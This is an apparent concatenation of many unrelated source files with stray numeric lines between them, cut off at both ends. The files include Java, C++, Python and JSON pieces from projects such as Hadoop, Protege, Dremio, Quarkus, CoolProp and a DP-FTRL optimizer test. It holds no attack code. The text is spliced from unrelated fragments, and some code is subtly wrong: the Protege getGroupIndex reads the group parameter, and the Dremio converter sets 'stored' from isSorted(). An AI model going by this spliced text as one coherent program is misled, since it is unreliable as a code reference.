    @SuppressWarnings("unused")
    public MyNoDefaultConstructorSoftAssertions(String arg) {}
  }

  private static class MySoftAssertions extends AbstractSoftAssertions {
  }

  // -------------------------------------------------------------------------

  // Fixture class: its methods/constructor are looked up reflectively above;
  // they are never executed.
  @SuppressWarnings("unused")
  private static class MyTests {

    public MyTests(SoftAssertions softly) {}

    @BeforeEach
    public void beforeEach(SoftAssertions softly) {}

    @Test
    public void softAssertions(SoftAssertions softly) {}

    @Test
    public void bddSoftAssertions(BDDSoftAssertions softly) {}

    @Test
    public void customSoftAssertions(MySoftAssertions softly) {}

    @Test
    public void abstractCustomSoftAssertions(MyAbstractSoftAssertions softly) {}

    @Test
    public void noDefaultConstructorCustomSoftAssertions(MyNoDefaultConstructorSoftAssertions softly) {}

    @Test
    public void string(String text) {}
  }

}
2,686
5,964
<reponame>FourFiftyNine/fourfiftynine.com<filename>public/javascript/libs/history.js/vendor/qunit/package.json { "name": "qunit", "author": { "name": "<NAME>", "email": "<EMAIL>", "url": "http://ejohn.org/" }, "maintainer": { "name": "<NAME>", "email": "<EMAIL>", "url": "http://bassistance.de/" }, "url": "http://docs.jquery.com/QUnit", "license": { "name": "MIT", "url": "http://www.opensource.org/licenses/mit-license.php" }, "description": "An easy-to-use JavaScript Unit Testing framework.", "keywords": [ "testing", "unit", "jquery" ], "lib": "qunit" }
248
965
// Processes all images found in `directory`.
// NOTE(review): unimplemented stub — the body is empty and the parameter is
// unused; confirm whether this is intentional or pending implementation.
void ProcessImages(const wstring& directory)
{
}
14
520
from CoolProp.HumidAirProp import HAProps

# Celsius -> Kelvin offset. Bug fix: the original script used 273.13 for the
# dry-bulb conversion (a typo) while correctly using 273.15 for the wet bulb;
# both conversions now use the standard 273.15.
C_TO_K = 273.15

print("Validation against <NAME> and <NAME>,\"Formulation for High-Temperature Properties for Moist Air\", HVAC&R Research v.8 #3, 2002")
print("Note: More accurate formulation employed than in Nelson. Just for sanity checking")
print("Yields a negative relative humidity for Tdb=5C,Twb=-3C, point omitted")

# Dry-bulb / wet-bulb test points [degrees C], paired element-wise.
tdb = [5, 5, 5, 25, 25, 25, 25, 50, 50, 50, 50, 50, 50, 50]
twb = [5, 2, -1, 25, 20, 15, 10, 50, 40, 30, 25, 22, 20, 19]


def _print_table(pressure_kPa):
    """Print one adiabatic-saturation comparison table at `pressure_kPa`.

    Factored out of the two previously duplicated per-pressure loops.
    """
    print("========================================================================")
    print("{Tdb:10s}{Twb:10s}{Tdp:10s}{R:10s}{W:10s}{h:10s}{v:10s}".format(W='W', Twb='Twb', Tdp='Tdp', Tdb='Tdb', v='v', h='h', s='s', R='RH'))
    print("{Tdb:10s}{Twb:10s}{Tdp:10s}{R:10s}{W:10s}{h:10s}{v:10s}".format(W='-', Twb='C', Tdp='C', Tdb='C', v='m^3/kg_da', h='kJ/kg_da', s='kJ/kg_da/K', R='%'))
    print("------------------------------------------------------------------------")
    for (tdb_, twb_) in zip(tdb, twb):
        T = tdb_ + C_TO_K
        Twb = twb_ + C_TO_K
        h = HAProps('H', 'T', T, 'Twb', Twb, 'P', pressure_kPa)
        tdp = HAProps('Tdp', 'T', T, 'Twb', Twb, 'P', pressure_kPa) - C_TO_K
        W = HAProps('W', 'T', T, 'Twb', Twb, 'P', pressure_kPa)
        R = HAProps('R', 'T', T, 'Twb', Twb, 'P', pressure_kPa) * 100
        v = HAProps('V', 'T', T, 'Twb', Twb, 'P', pressure_kPa)
        s = 0  # entropy column is not compared; printed value unused as in the original
        print("{Tdb:10.2f}{Twb:10.2f}{Tdp:10.2f}{R:10.1f}{W:10.5f}{h:10.2f}{v:10.3f}".format(W=W, Twb=twb_, Tdp=tdp, Tdb=tdb_, v=v, h=h, s=s, R=R))
    print("------------------------------------------------------------------------")


print(" ")
print("Table 6: Adiabatic Saturation")
print("P=101325 Pa, Altitude = 0 m")
_print_table(101.325)

print(" ")
print("Table 7: Adiabatic Saturation")
print("P=84,556 Pa, Altitude = 1500 m")
_print_table(84.556)
1,349
4,140
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.hive.metastore.model; public class MNotificationLog { private long eventId; // This is not the datanucleus id, but the id assigned by the sequence private int eventTime; private String eventType; private String catalogName; private String dbName; private String tableName; private String message; private String messageFormat; public MNotificationLog() { } public MNotificationLog(int eventId, String eventType, String catName, String dbName, String tableName, String message) { this.eventId = eventId; this.eventType = eventType; this.catalogName = catName; this.dbName = dbName; this.tableName = tableName; this.message = message; } public void setEventId(long eventId) { this.eventId = eventId; } public long getEventId() { return eventId; } public int getEventTime() { return eventTime; } public void setEventTime(int eventTime) { this.eventTime = eventTime; } public String getEventType() { return eventType; } public void setEventType(String eventType) { this.eventType = eventType; } public String getDbName() { return dbName; } public void setDbName(String dbName) { this.dbName = dbName; } public String getCatalogName() { return catalogName; } public void setCatalogName(String 
catName) { this.catalogName = catName; } public String getTableName() { return tableName; } public void setTableName(String tableName) { this.tableName = tableName; } public String getMessage() { return message; } public void setMessage(String message) { this.message = message; } public String getMessageFormat() { return messageFormat; } public void setMessageFormat(String messageFormat) { this.messageFormat = messageFormat; } }
821
746
<filename>protege-editor-core/src/main/java/org/protege/editor/core/ui/action/ToolBarActionPluginJPFImpl.java package org.protege.editor.core.ui.action; import org.eclipse.core.runtime.IExtension; import org.protege.editor.core.editorkit.EditorKit; import javax.swing.*; /** * Author: <NAME><br> * The University Of Manchester<br> * Medical Informatics Group<br> * Date: Mar 28, 2006<br><br> * <EMAIL><br> * www.cs.man.ac.uk/~horridgm<br><br> */ public class ToolBarActionPluginJPFImpl extends ProtegeActionPluginJPFImpl implements ToolBarActionPlugin { public static final String EXTENSION_POINT_ID = "ToolBarAction"; private static final String GROUP_PARAM = "group"; public static final String GROUP_INDEX_PARAM = "groupIndex"; private static final String DEFAULT_GROUP = "Z"; private static final String DEFAULT_GROUP_INDEX = "Z"; public ToolBarActionPluginJPFImpl(EditorKit editorKit, IExtension extension) { super(editorKit, extension); } public String getGroup() { return getPluginProperty(GROUP_PARAM, DEFAULT_GROUP); } public String getGroupIndex() { return getPluginProperty(GROUP_PARAM, DEFAULT_GROUP_INDEX); } /** * Creates an instance of the plugin. It is expected that * this instance will be "setup", but the instance's * initialise method will not have been called in the instantiation * process. */ public ProtegeAction newInstance() throws ClassNotFoundException, IllegalAccessException, InstantiationException { ProtegeAction menuAction = super.newInstance(); menuAction.putValue(AbstractAction.NAME, getName()); menuAction.putValue(AbstractAction.SHORT_DESCRIPTION, getToolTipText()); menuAction.setEditorKit(getEditorKit()); return menuAction; } }
630
1,085
/*
 * Copyright (C) 2017-2019 Dremio Corporation
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package com.dremio.datastore;

import com.dremio.datastore.RemoteDataStoreProtobuf.PutRequestIndexKey;
import com.dremio.datastore.RemoteDataStoreProtobuf.SearchRequest;
import com.dremio.datastore.api.LegacyIndexedStore.LegacyFindByCondition;
import com.dremio.datastore.indexed.IndexKey;

/**
 * Utilities related to remote invocation of datastore.
 */
public final class RemoteDataStoreUtils {

  /**
   * Converts a {@link SearchRequest} to a {@link LegacyFindByCondition}.
   *
   * @param searchRequest search request
   * @return find by condition
   */
  public static LegacyFindByCondition getConditionFromRequest(SearchRequest searchRequest) {
    final LegacyFindByCondition findByCondition = new LegacyFindByCondition();
    // Optional fields are only copied when present on the protobuf message.
    if (searchRequest.hasLimit()) {
      findByCondition.setLimit(searchRequest.getLimit());
    }
    if (searchRequest.hasOffset()) {
      findByCondition.setOffset(searchRequest.getOffset());
    }
    if (searchRequest.hasPageSize()) {
      findByCondition.setPageSize(searchRequest.getPageSize());
    }
    if (searchRequest.getSortCount() != 0) {
      findByCondition.addSortings(searchRequest.getSortList());
    }
    if (searchRequest.hasQuery()) {
      findByCondition.setCondition(searchRequest.getQuery());
    }
    return findByCondition;
  }

  /**
   * Converts a {@link LegacyFindByCondition} to a {@link SearchRequest}.
   * Inverse of {@link #getConditionFromRequest}.
   *
   * @param storeId store id
   * @param condition find by condition
   * @return search request
   */
  public static SearchRequest getRequestFromCondition(String storeId, LegacyFindByCondition condition) {
    final SearchRequest.Builder builder = SearchRequest.newBuilder();
    builder.setStoreId(storeId);
    if (condition.getCondition() != null) {
      builder.setQuery(condition.getCondition());
    }
    // limit/offset/pageSize are always set (ints have defaults on the
    // LegacyFindByCondition side), unlike the nullable query and sort list.
    builder.setLimit(condition.getLimit());
    builder.setOffset(condition.getOffset());
    builder.setPageSize(condition.getPageSize());
    if (!condition.getSort().isEmpty()) {
      builder.addAllSort(condition.getSort());
    }
    return builder.build();
  }

  /**
   * Converts an {@link IndexKey} to {@link PutRequestIndexKey} for use with remote datastore
   * PutRequests in indexed stores, for use with DocumentWriters such as
   * {@link com.dremio.datastore.indexed.SimpleDocumentWriter}.
   *
   * @param indexKey The index key to convert.
   * @return The PutRequestIndexKey that can be attached to PutRequest api calls.
   */
  public static PutRequestIndexKey toPutRequestIndexKey(IndexKey indexKey) {
    // NOTE(review): 'stored' is populated from isSorted() here, while the
    // reverse mapping in toIndexKey() feeds getStored() into setStored().
    // Confirm this is not a typo for an isStored() accessor on IndexKey.
    PutRequestIndexKey.Builder builder = PutRequestIndexKey.newBuilder()
      .setShortName(indexKey.getShortName())
      .setIndexFieldName(indexKey.getIndexFieldName())
      .setStored(indexKey.isSorted())
      .setCanContainMultipleValues(indexKey.canContainMultipleValues());

    SearchTypes.SearchFieldSorting.FieldType sortedValueType = indexKey.getSortedValueType();
    if (null != sortedValueType) {
      builder.setSortingValueType(sortedValueType);
    }

    Class<?> valueType = indexKey.getValueType();
    if (valueType == String.class) {
      // bytes are labelled with valuetype of String in SimpleDocumentConverter
      builder.setValueType(RemoteDataStoreProtobuf.PutRequestIndexKeyValueType.STRING);
    } else if (valueType == Long.class) {
      builder.setValueType(RemoteDataStoreProtobuf.PutRequestIndexKeyValueType.LONG);
    } else if (valueType == Integer.class) {
      builder.setValueType(RemoteDataStoreProtobuf.PutRequestIndexKeyValueType.INTEGER);
    } else if (valueType == Double.class) {
      builder.setValueType(RemoteDataStoreProtobuf.PutRequestIndexKeyValueType.DOUBLE);
    } else {
      // Unknown value types are a programming error, not a data error.
      throw new IllegalStateException(String.format("Unknown index key value type: %s", valueType.getName()));
    }

    return builder.build();
  }

  /**
   * Converts a {@link PutRequestIndexKey} to an {@link IndexKey} for use with DocumentWriters.
   * Inverse of {@link #toPutRequestIndexKey}.
   *
   * @param requestIndexKey The PutRequestIndexKey which was attached to a PutRequest api call.
   * @return The index key to be used with DocumentWriters such as
   *         {@link com.dremio.datastore.indexed.SimpleDocumentWriter}.
   */
  public static IndexKey toIndexKey(PutRequestIndexKey requestIndexKey) {
    final Class<?> valueType;
    switch (requestIndexKey.getValueType()) {
      case INTEGER:
        valueType = Integer.class;
        break;
      case DOUBLE:
        valueType = Double.class;
        break;
      case LONG:
        valueType = Long.class;
        break;
      case STRING:
        valueType = String.class;
        break;
      default:
        throw new IllegalStateException(String.format("Unknown index key type: %s", requestIndexKey.getValueType().name()));
    }

    IndexKey.Builder builder = IndexKey.newBuilder(requestIndexKey.getShortName(), requestIndexKey.getIndexFieldName(), valueType)
      .setStored(requestIndexKey.getStored())
      .setCanContainMultipleValues(requestIndexKey.getCanContainMultipleValues());

    if (requestIndexKey.hasSortingValueType()) {
      switch (requestIndexKey.getSortingValueType()) {
        case STRING:
          builder.setSortedValueType(SearchTypes.SearchFieldSorting.FieldType.STRING);
          break;
        case LONG:
          builder.setSortedValueType(SearchTypes.SearchFieldSorting.FieldType.LONG);
          break;
        case DOUBLE:
          builder.setSortedValueType(SearchTypes.SearchFieldSorting.FieldType.DOUBLE);
          break;
        case INTEGER:
          builder.setSortedValueType(SearchTypes.SearchFieldSorting.FieldType.INTEGER);
          break;
        default:
          throw new IllegalStateException(String.format("Unknown index key sorting value type: %s", requestIndexKey.getSortingValueType().name()));
      }
    }
    return builder.build();
  }

  // Static utility class: not instantiable.
  private RemoteDataStoreUtils() {
  }
}
2,187
348
{"nom":"Millonfosse","circ":"20ème circonscription","dpt":"Nord","inscrits":570,"abs":305,"votants":265,"blancs":17,"nuls":2,"exp":246,"res":[{"nuance":"COM","nom":"<NAME>","voix":156},{"nuance":"FN","nom":"<NAME>","voix":90}]}
90
343
// Copyright 2012 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

#ifndef SYZYGY_BLOCK_GRAPH_BASIC_BLOCK_TEST_UTIL_H_
#define SYZYGY_BLOCK_GRAPH_BASIC_BLOCK_TEST_UTIL_H_

#include "gtest/gtest.h"
#include "syzygy/block_graph/basic_block_decomposer.h"
#include "syzygy/block_graph/basic_block_subgraph.h"
#include "syzygy/block_graph/unittest_util.h"

extern "C" {

// Functions and labels exposed from our .asm test stub.
extern int assembly_func();
extern int unreachable_label();
extern int interrupt_label();
extern int assembly_func_end();
extern int case_0();
extern int case_1();
extern int case_default();
extern int jump_table();
extern int case_table();

// Functions invoked or referred by the .asm test stub. These are defined in
// basic_block_test_util.cc.
extern int func1();
extern int func2();

}  // extern "C"

namespace testing {

// A utility class for generating test data built around the function in
// basic_block_assembly_func.asm. When assembly_func_ is decomposed as a basic
// block subgraph the layout is as follows:
//
// BB0: offset 0, code, assembly_func, 4 instructions, 0 successors
// BB1: offset 23, code/padding (unreachable code)
// BB2: offset 24, code, case_0, 2 instructions, 1 successor
// BB3: offset 31, code, sub eax to jnz, 1 instruction, 2 successors
// BB4: offset 36, code, ret, 1 instruction, 0 successors
// BB5: offset 37, code, case_1, 1 instruction, 1 successor
// BB6: offset 42, code, case_default, 2 instructions, 0 successors
// BB7: offset 49, code/padding, interrupt_label, 3 instruction, 0 successors
// BB8: offset 50, data, jump_table, 12 bytes
// BB9: offset 62, data, case_table, 256 bytes
class BasicBlockTest : public ::testing::Test {
 public:
  // Convenience aliases so test bodies can use short names.
  typedef core::RelativeAddress RelativeAddress;
  typedef block_graph::BlockGraph BlockGraph;
  typedef block_graph::BasicBlockDecomposer BasicBlockDecomposer;
  typedef block_graph::BasicBlockSubGraph BasicBlockSubGraph;
  typedef BasicBlockSubGraph::BasicBlock BasicBlock;
  typedef BasicBlockSubGraph::BlockDescription BlockDescription;
  typedef BlockGraph::Block Block;
  typedef BlockGraph::Reference Reference;
  typedef BlockGraph::Section Section;

  // The number and type of basic blocks.
  // NOTE(review): the padding counts appear to be subsets of the code/data
  // counts above (kNumBasicBlocks does not add them in) — confirm against the
  // BB0-BB9 layout documented on the class.
  static const size_t kNumCodeBasicBlocks = 8;
  static const size_t kNumDataBasicBlocks = 2;
  static const size_t kNumEndBasicBlocks = 1;
  static const size_t kNumCodePaddingBasicBlocks = 2;
  static const size_t kNumDataPaddingBasicBlocks = 0;
  static const size_t kNumBasicBlocks =
      kNumCodeBasicBlocks + kNumDataBasicBlocks + kNumEndBasicBlocks;

  BasicBlockTest();

  // Initializes block_graph, assembly_func, func1, func2 and data. Meant to be
  // wrapped in ASSERT_NO_FATAL_FAILURE.
  void InitBlockGraph();

  // Initializes subgraph, bbs and bds. Meant to be wrapped in
  // ASSERT_NO_FATAL_FAILURE.
  // @pre InitBlockGraph must have been called successfully.
  void InitBasicBlockSubGraph();

  // Initializes block_graph_, text_section_, func1_, and func2_. Leaves
  // data_section_, assembly_func_ and data_ NULL. func2_ contains a function
  // with a debug-end label past the end of the block, and internally it calls
  // func1_.
  void InitBasicBlockSubGraphWithLabelPastEnd();

  // Initialized by InitBlockGraph.
  // @{
  // Start address of the assembly function.
  RelativeAddress start_addr_;
  testing::DummyTransformPolicy policy_;
  BlockGraph block_graph_;
  Section* text_section_;
  Section* data_section_;
  Block* assembly_func_;
  Block* func1_;
  Block* func2_;
  Block* data_;
  // @}

  // Initialized by InitBasicBlockSubGraph and
  // InitBasicBlockSubGraphWithLabelPastEnd.
  // @{
  BasicBlockSubGraph subgraph_;
  std::vector<BasicBlock*> bbs_;
  std::vector<BlockDescription*> bds_;
  // @}
};

}  // namespace testing

#endif  // SYZYGY_BLOCK_GRAPH_BASIC_BLOCK_TEST_UTIL_H_
1,392
2,487
<reponame>gitter-badger/swagger-bootstrap-ui /* * Copyright (C) 2018 Zhejiang xiaominfo Technology CO.,LTD. * All rights reserved. * Official Web Site: http://www.xiaominfo.com. * Developer Web Site: http://open.xiaominfo.com. */ package com.github.xiaoymin.swaggerbootstrapui.filter; import com.github.xiaoymin.swaggerbootstrapui.conf.Consts; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.util.ArrayList; import java.util.Base64; import java.util.List; import java.util.regex.Pattern; /*** * * @since:swagger-bootstrap-ui 1.9.0 * @author <a href="mailto:<EMAIL>"><EMAIL></a> * 2019/02/02 19:57 */ public class BasicFilter implements Consts{ private Logger logger= LoggerFactory.getLogger(BasicFilter.class); protected List<Pattern> urlFilters=null; public BasicFilter(){ urlFilters=new ArrayList<>(); urlFilters.add(Pattern.compile(".*?/doc\\.html.*",Pattern.CASE_INSENSITIVE)); urlFilters.add(Pattern.compile(".*?/v2/api-docs.*",Pattern.CASE_INSENSITIVE)); urlFilters.add(Pattern.compile(".*?/v2/api-docs-ext.*",Pattern.CASE_INSENSITIVE)); urlFilters.add(Pattern.compile(".*?/swagger-resources.*",Pattern.CASE_INSENSITIVE)); urlFilters.add(Pattern.compile(".*?/swagger-ui\\.html.*",Pattern.CASE_INSENSITIVE)); urlFilters.add(Pattern.compile(".*?/swagger-resources/configuration/ui.*",Pattern.CASE_INSENSITIVE)); urlFilters.add(Pattern.compile(".*?/swagger-resources/configuration/security.*",Pattern.CASE_INSENSITIVE)); } protected boolean match(String uri){ boolean match=false; if (uri!=null){ for (Pattern pattern:getUrlFilters()){ if (pattern.matcher(uri).matches()){ match=true; break; } } } return match; } protected String decodeBase64(String source){ String decodeStr=null; if (source!=null){ //BASE64Decoder decoder=new BASE64Decoder(); try { //byte[] bytes=decoder.decodeBuffer(source); byte[] bytes=Base64.getDecoder().decode(source); decodeStr=new String(bytes); } catch (Exception e) { logger.error(e.getMessage(),e); } } return decodeStr; } public 
List<Pattern> getUrlFilters() { return urlFilters; } }
1,093
10,225
package io.quarkus.vertx.web;

import java.util.Objects;

import io.quarkus.vertx.web.runtime.JsonArrayMulti;
import io.quarkus.vertx.web.runtime.NdjsonMulti;
import io.quarkus.vertx.web.runtime.SSEMulti;
import io.smallrye.mutiny.Multi;

/**
 * Provides utility methods, mainly to handle {@code text/event-stream} responses.
 */
public class ReactiveRoutes {

    private ReactiveRoutes() {
        // Avoid direct instantiation.
    }

    /**
     * Indicates that the given stream should be written as server-sent-event in the response.
     * Returning a {@code multi} wrapped using this method produces a {@code text/event-stream} response. Each item
     * is written as an event in the response. The response automatically enables the chunked encoding and set the
     * content type.
     * <p>
     * If the item is a String, the {@code data} part of the event is this string. An {@code id} is automatically
     * generated.
     * If the item is a Buffer, the {@code data} part of the event is this buffer. An {@code id} is automatically
     * generated.
     * If the item is an Object, the {@code data} part of the event is the JSON representation of this object. An
     * {@code id} is automatically generated.
     * If the item is an {@link ServerSentEvent}, the {@code data} part of the event is the JSON representation of this
     * {@link ServerSentEvent#data()}. The {@code id} is computed from {@link ServerSentEvent#id()} (generated if not
     * implemented). The {@code event} section (ignored in all the other case) is computed from
     * {@link ServerSentEvent#event()}.
     * <p>
     * Example of usage:
     *
     * <pre>
     * &#64;Route(path = "/people")
     * Multi&lt;Person&gt; people(RoutingContext context) {
     *     return ReactiveRoutes.asEventStream(Multi.createFrom().items(
     *             new Person("superman", 1),
     *             new Person("batman", 2),
     *             new Person("spiderman", 3)));
     * }
     * </pre>
     *
     * @param multi the multi to be written
     * @param <T> the type of item, can be string, buffer, object or io.quarkus.vertx.web.ReactiveRoutes.ServerSentEvent
     * @return the wrapped multi
     */
    public static <T> Multi<T> asEventStream(Multi<T> multi) {
        return new SSEMulti<>(Objects.requireNonNull(multi, "The passed multi must not be `null`"));
    }

    /**
     * Indicates that the given stream should be written as a Json stream in the response.
     * Returning a {@code multi} wrapped using this method produces a {@code application/x-ndjson} response. Each item
     * is written as a serialized JSON object on a new line in the response. The response automatically enables the
     * chunked encoding and set the content type.
     * <p>
     * If the item is a String, the content will be wrapped in quotes and written.
     * If the item is an Object, then the JSON representation of this object will be written.
     * <p>
     * Example of usage:
     *
     * <pre>
     * &#64;Route(path = "/people")
     * Multi&lt;Person&gt; people(RoutingContext context) {
     *     return ReactiveRoutes.asJsonStream(Multi.createFrom().items(
     *             new Person("superman", 1),
     *             new Person("batman", 2),
     *             new Person("spiderman", 3)));
     * }
     * </pre>
     *
     * This example produces:
     *
     * <pre>
     * {"name":"superman", "id":1}
     * {...}
     * {...}
     * </pre>
     *
     * @param multi the multi to be written
     * @param <T> the type of item, can be string, object
     * @return the wrapped multi
     */
    public static <T> Multi<T> asJsonStream(Multi<T> multi) {
        return new NdjsonMulti<>(Objects.requireNonNull(multi, "The passed multi must not be `null`"));
    }

    /**
     * Indicates that the given stream should be written as a <em>chunked</em> JSON array in the response.
     * Returning a {@code multi} wrapped using this method produces a {@code application/json} response. Each item
     * is written as a JSON object in the response. The response automatically enables the chunked encoding and set the
     * content type.
     * <p>
     * If the item is a String, the content is written in the array.
     * If the item is an Object, the content is transformed to JSON and written in the array.
     * <p>
     * Note that the array is written in the response item by item, without accumulating the data.
     *
     * Example of usage:
     *
     * <pre>
     * &#64;Route(path = "/people")
     * Multi&lt;Person&gt; people(RoutingContext context) {
     *     return ReactiveRoutes.asJsonArray(Multi.createFrom().items(
     *             new Person("superman", 1),
     *             new Person("batman", 2),
     *             new Person("spiderman", 3)));
     * }
     * </pre>
     *
     * This example produces: {@code [{"name":"superman", "id":1}, {...}, {..,}]}
     *
     * @param multi the multi to be written
     * @param <T> the type of item, can be string or object
     * @return the wrapped multi
     */
    public static <T> Multi<T> asJsonArray(Multi<T> multi) {
        return new JsonArrayMulti<>(Objects.requireNonNull(multi, "The passed multi must not be `null`"));
    }

    /**
     * An interface allowing customization of how the server-sent events are written.
     * <p>
     * The {@code data} section of the resulting event is the JSON representation of the result from {@link #data()}.
     * If {@link #event()} does not return {@code null}, the {@code event} section is written with the result as value.
     * If {@link #id()} is implemented, the {@code id} section uses this value.
     *
     * @param <T> the type of payload, used for the {@code data} section of the event.
     */
    public interface ServerSentEvent<T> {

        /**
         * The {@code event} section.
         *
         * @return the name of the event. If {@code null}, the written event won't have an {@code event} section
         */
        default String event() {
            return null;
        }

        /**
         * The {@code data} section.
         *
         * @return the object that will be encoded to JSON. Must not be {@code null}
         */
        T data();

        /**
         * The {@code id} section.
         * If not implemented, an automatic id is inserted.
         *
         * @return the id
         */
        default long id() {
            return -1L;
        }
    }
}
2,493
330
# Copyright 2021, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test server optimizers."""

import collections

from absl.testing import parameterized
import numpy as np
import tensorflow as tf

from dp_ftrl import optimizer_utils

# Minimal model: a dense weight matrix and a bias vector.
ModelVariables = collections.namedtuple('ModelVariables', 'weights bias')


def _create_model_variables():
  """Returns zero-initialized (784, 10) weights and (10,) bias variables."""
  return ModelVariables(
      weights=tf.Variable(
          lambda: tf.zeros(dtype=tf.float32, shape=(784, 10)),
          name='weights',
          trainable=True),
      bias=tf.Variable(
          lambda: tf.zeros(dtype=tf.float32, shape=(10)),
          name='bias',
          trainable=True))


class OptimizerTest(tf.test.TestCase, parameterized.TestCase):

  def test_deterministic_sgd(self):
    """Two SGD steps with all-ones grads and lr=0.1 move weights to -0.2."""
    model_variables = _create_model_variables()
    grad = tf.nest.map_structure(tf.ones_like, model_variables)
    optimizer = optimizer_utils.SGDServerOptimizer(learning_rate=0.1)
    state = optimizer.init_state()
    for i in range(2):
      state = optimizer.model_update(state, model_variables, grad, i)

    self.assertLen(model_variables, 2)
    # variables initialize with all zeros and update with all ones and learning
    # rate 0.1 for several steps.
    flatten_variables = tf.nest.flatten(model_variables)
    self.assertAllClose(flatten_variables,
                        [-0.2 * np.ones_like(v) for v in flatten_variables])

  # Case naming: m<momentum>s<steps>; `result` is the expected magnitude of
  # every variable entry after `steps` updates.
  @parameterized.named_parameters(
      ('ftrl_m0s2', optimizer_utils.DPFTRLMServerOptimizer, 0, 2, 0.2),
      ('ftrl_m0.9s2', optimizer_utils.DPFTRLMServerOptimizer, 0.9, 2, 0.29),
      ('ftrl_m0s3', optimizer_utils.DPFTRLMServerOptimizer, 0, 3, 0.3),
      ('ftrl_m0.9s3', optimizer_utils.DPFTRLMServerOptimizer, 0.9, 3, 0.561),
      ('sgd_m0s2', optimizer_utils.DPSGDMServerOptimizer, 0, 2, 0.2),
      ('sgd_m0.9s2', optimizer_utils.DPSGDMServerOptimizer, 0.9, 2, 0.29),
      ('sgd_m0s3', optimizer_utils.DPSGDMServerOptimizer, 0, 3, 0.3),
      ('sgd_m0.9s3', optimizer_utils.DPSGDMServerOptimizer, 0.9, 3, 0.561))
  def test_deterministic(self, optimizer_fn, momentum, steps, result):
    """Noise-free DP optimizers are deterministic for fixed grads/steps."""
    model_variables = _create_model_variables()
    model_weight_specs = tf.nest.map_structure(
        lambda v: tf.TensorSpec(v.shape, v.dtype), model_variables)
    grad = tf.nest.map_structure(tf.ones_like, model_variables)
    optimizer = optimizer_fn(
        learning_rate=0.1,
        momentum=momentum,
        noise_std=0.0,
        model_weight_specs=model_weight_specs)
    state = optimizer.init_state()
    for i in range(steps):
      state = optimizer.model_update(state, model_variables, grad, i)

    self.assertLen(model_variables, 2)
    # variables initialize with all zeros and update with all ones and learning
    # rate 0.1 for several steps.
    flatten_variables = tf.nest.flatten(model_variables)
    self.assertAllClose(flatten_variables,
                        [-result * np.ones_like(v) for v in flatten_variables])

  @parameterized.named_parameters(
      ('m0s2', 0, 2, False),
      ('m0.9s2', 0.9, 2, False),
      ('m0s3', 0.9, 10, False),
      ('m0s3nes', 0.9, 10, True),
  )
  def test_ftrl_match_keras(self, momentum, steps, nesterov):
    """Noise-free FTRL matches Keras SGD on an unconstrained problem."""
    # FTRL is identical to SGD for unconstrained problem when no noise is added;
    # it is identical to Keras SGD without learning rate change.
    lr = 0.1

    def _run_ftrl():
      # Runs `steps` FTRL updates and returns the flattened variables.
      model_variables = _create_model_variables()
      model_weight_specs = tf.nest.map_structure(
          lambda v: tf.TensorSpec(v.shape, v.dtype), model_variables)
      grad = tf.nest.map_structure(tf.ones_like, model_variables)
      optimizer = optimizer_utils.DPFTRLMServerOptimizer(
          learning_rate=lr,
          momentum=momentum,
          noise_std=0.0,
          model_weight_specs=model_weight_specs,
          use_nesterov=nesterov)
      state = optimizer.init_state()
      for i in range(steps):
        state = optimizer.model_update(state, model_variables, grad, i)
      self.assertLen(model_variables, 2)
      return tf.nest.flatten(model_variables)

    def _run_keras():
      # Reference: the same schedule under tf.keras.optimizers.SGD.
      model_variables = tf.nest.flatten(_create_model_variables())
      grad = tf.nest.map_structure(tf.ones_like, model_variables)
      optimizer = tf.keras.optimizers.SGD(
          learning_rate=lr, momentum=momentum, nesterov=nesterov)
      for _ in range(steps):
        optimizer.apply_gradients(zip(grad, model_variables))
      return model_variables

    self.assertAllClose(_run_ftrl(), _run_keras())


if __name__ == '__main__':
  tf.test.main()
2,077
369
// Copyright (c) 2017-2021, Mudit<NAME>. All rights reserved. // For licensing, see https://github.com/mudita/MuditaOS/LICENSE.md #include <string> #include <memory> #include <at/Result.hpp> #include <at/Commands.hpp> #include <at/ATFactory.hpp> #include "service-cellular/requests/ImeiRequest.hpp" namespace cellular { at::Cmd ImeiRequest::command() { return at::Cmd(at::factory(at::AT::GET_IMEI)); } void ImeiRequest::handle(RequestHandler &h, at::Result &result) { h.handle(*this, result); } std::unique_ptr<ImeiRequest> ImeiRequest::create(const std::string &data, GroupMatch) { return std::make_unique<ImeiRequest>(data); } }; // namespace cellular
292
344
import ast

import pytest

from prettyprinter import pformat


def test_parsed():
    """A parsed module pretty-prints as nested AST constructor calls."""
    tree = ast.parse('value = 42')
    expected = """\
ast.Module(
    body=[
        ast.Assign(
            targets=[ast.Name(id='value', ctx=ast.Store())],
            value=ast.Num(n=42)
        )
    ]
)"""
    assert pformat(tree, width=999) == expected


@pytest.mark.parametrize('cls, identifier', [
    (ast.Name, 'ast.Name'),
